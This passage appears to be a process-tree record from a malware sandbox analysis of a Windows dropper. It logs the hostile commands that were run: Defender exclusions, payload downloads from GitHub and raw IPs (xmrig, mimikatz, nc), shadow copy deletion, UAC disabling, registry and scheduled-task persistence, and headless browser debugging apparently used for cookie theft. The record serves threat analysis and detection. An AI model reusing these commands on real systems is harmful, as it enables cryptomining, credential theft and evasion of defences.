    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
    3⤵
    PID:7864
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:888
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1020
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3124
- - \??\c:\Windows\system32\wbem\wmic.exe
    c:\LxAfDT\LxAf\..\..\Windows\LxAf\LxAf\..\..\system32\LxAf\LxAf\..\..\wbem\LxAf\LxAfD\..\..\wmic.exe shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6080
- - \??\c:\Windows\system32\wbem\wmic.exe
    c:\nEzaeR\nEza\..\..\Windows\nEza\nEza\..\..\system32\nEza\nEza\..\..\wbem\nEza\nEzae\..\..\wmic.exe shadowcopy delete
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe"
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:6780
  - - C:\Windows\SysWOW64\PING.EXE
      ping 1.1.1.1 -n 1 -w 3000
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5440
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5244
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5348
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8588
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
    3⤵
    PID:2012
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8796
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5364
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66klmnr.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66klmnr.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5640
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
    3⤵
    - Indicator Removal: Clear Persistence
    - System Location Discovery: System Language Discovery
    PID:5568
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2472
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dwm.exe
      4⤵
      Kills process with taskkill
      PID:8792
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:8716
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:5428
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:6656
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:7188
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5980
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:7620
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:5972
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesz1nk0vrandom.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesz1nk0vrandom.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:428
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:7664
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:8992
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsA.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsA.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAaAB0AHQAcAAxADYAMgAuADIAMwAwAC4ANAA4AC4AMQA4ADkAdQBwAGwAbwBhAGQAcwBBAC4AZQB4AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAaAB0AHQAcAAxADYAMgAuADIAMwAwAC4ANAA4AC4AMQA4ADkAdQBwAGwAbwBhAGQAcwBBAC4AZQB4AGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AZQBzAHMAYQBnAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQAuAGUAeABlAA==
    3⤵
    PID:2636
- - C:\Users\Admin\AppData\Local\Temp\LIBAdmin.exe
    "C:\Users\Admin\AppData\Local\Temp\LIBAdmin.exe"
    3⤵
    PID:7980
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      PID:8196
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:5904
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshClient.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshClient.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5776
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsDL.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsDL.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4976
- - C:\Users\Admin\AppData\Local\Temp\tmpECA8.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmpECA8.tmp.exe"
    3⤵
    PID:7272
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsB.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsB.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2408
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAaAB0AHQAcAAxADYAMgAuADIAMwAwAC4ANAA4AC4AMQA4ADkAdQBwAGwAbwBhAGQAcwBCAC4AZQB4AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAaAB0AHQAcAAxADYAMgAuADIAMwAwAC4ANAA4AC4AMQA4ADkAdQBwAGwAbwBhAGQAcwBCAC4AZQB4AGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEMAbwB1AG4AdAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABDAG8AdQBuAHQALgBlAHgAZQA=
    3⤵
    PID:5484
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshbuild.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshbuild.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:1604
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshDevil2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshDevil2.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6224
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptBREMCOS.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptBREMCOS.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6256
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsWinZip.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsWinZip.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7224
- C:\Users\Admin\AppData\Local\Temp\http77.105.161.58files1.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http77.105.161.58files1.exe.exe"
  2⤵
  PID:7012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:8264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1836
- C:\Users\Admin\AppData\Local\Temp\http77.105.161.58filesloader.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http77.105.161.58filesloader.exe.exe"
  2⤵
  PID:7412
- - C:\Users\Admin\AppData\Local\Temp\http77.105.161.58filesloader.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.105.161.58filesloader.exe.exe"
    3⤵
    PID:7556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\Admin\AppData\Roaming\1.exe"
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:7328
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Roaming\1.exe"
        5⤵
        Views/modifies file attributes
        
        PID:7368
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /tn Delete1ExeAfterDelay /tr "del \"C:\Users\Admin\AppData\Roaming\1.exe\"" /sc once /st 16:46 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4200
- C:\Users\Admin\AppData\Local\Temp\http85.209.128.206DownloadsVirtualPR.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http85.209.128.206DownloadsVirtualPR.exe.exe"
  2⤵
  PID:8612
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n50eri5w\n50eri5w.cmdline"
    3⤵
    PID:5468
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES363F.tmp" "c:\Users\Admin\AppData\Local\Temp\n50eri5w\CSCEC61B00BDDF242B0BCB91FC755307682.TMP"
      4⤵
      PID:4048
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uqxowbdy\uqxowbdy.cmdline"
    3⤵
    PID:5388
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES538B.tmp" "c:\Users\Admin\AppData\Local\Temp\uqxowbdy\CSCD24B1F93D8464FC8A3CBFAD538859331.TMP"
      4⤵
      PID:4604
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5844
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:964
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5556
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
      4⤵
      PID:2936
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
      4⤵
      PID:5288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:724
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc7c0446f8,0x7ffc7c044708,0x7ffc7c044718
        5⤵
        
        PID:7064
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7464
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc7bcfcc40,0x7ffc7bcfcc4c,0x7ffc7bcfcc58
        5⤵
        
        PID:6024
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
      4⤵
      PID:9084
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainskeet.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainskeet.exe.exe"
  2⤵
  PID:6508
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainExtreme%20Injector%20v3.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainExtreme%20Injector%20v3.exe.exe"
  2⤵
  PID:5300
- - C:\Users\Admin\AppData\Local\Temp\Exela.exe
    "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
    3⤵
    PID:300
  - - C:\Users\Admin\AppData\Local\Temp\Exela.exe
      "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
      4⤵
      PID:8692
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:4992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:8556
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:8480
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        5⤵
        
        PID:8896
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        6⤵
        
        PID:8880
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        5⤵
        
        PID:7844
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:9104
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:6264
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        5⤵
        
        PID:5232
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        6⤵
        
        PID:5548
- - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
    "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
    3⤵
    PID:6576
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainmtQ.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainmtQ.exe.exe"
  2⤵
  PID:8500
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp14.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp14.exe.exe"
  2⤵
  PID:3296
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainConsoleApp22.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainConsoleApp22.exe.exe"
  2⤵
  PID:4680
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp50.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp50.exe.exe"
  2⤵
  PID:1488
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainjopa.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainjopa.exe.exe"
  2⤵
  PID:7768
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainvmss.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainvmss.exe.exe"
  2⤵
  PID:7312
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainRoot.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainRoot.exe.exe"
  2⤵
  PID:8252
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainkooki.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainkooki.exe.exe"
  2⤵
  PID:6904
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainRuntimeBroker.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainRuntimeBroker.exe.exe"
  2⤵
  PID:5024
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp32.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindowsFormsApp32.exe.exe"
  2⤵
  PID:7280
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainCHROM.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainCHROM.exe.exe"
  2⤵
  PID:288
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainCONHOST.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainCONHOST.exe.exe"
  2⤵
  PID:8168
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainputisha.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainputisha.exe.exe"
  2⤵
  PID:4608
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindows.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainWindows.exe.exe"
  2⤵
  PID:6588
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainConsoleApp23.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comkfocc557kfoccrawrefsheadsmainConsoleApp23.exe.exe"
  2⤵
  PID:3388
- C:\Users\Admin\AppData\Local\Temp\http194.38.22.120xmrig.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http194.38.22.120xmrig.exe.exe"
  2⤵
  PID:332
- C:\Users\Admin\AppData\Local\Temp\http212.57.37.63nc.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http212.57.37.63nc.exe.exe"
  2⤵
  PID:1764
- C:\Users\Admin\AppData\Local\Temp\http200.14.250.72IMG001.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http200.14.250.72IMG001.exe.exe"
  2⤵
  PID:6720
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
    3⤵
    PID:7968
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im tftp.exe
      4⤵
      Kills process with taskkill
      PID:6572
- - C:\Users\Admin\AppData\Local\Temp\tftp.exe
    "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
    3⤵
    PID:6624
- - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
    "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
    3⤵
    PID:2768
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      PID:6288
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        5⤵
        Kills process with taskkill
        
        PID:9128
  - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      PID:9144
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
      4⤵
      PID:8256
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        5⤵
        
        PID:4408
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      PID:2376
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
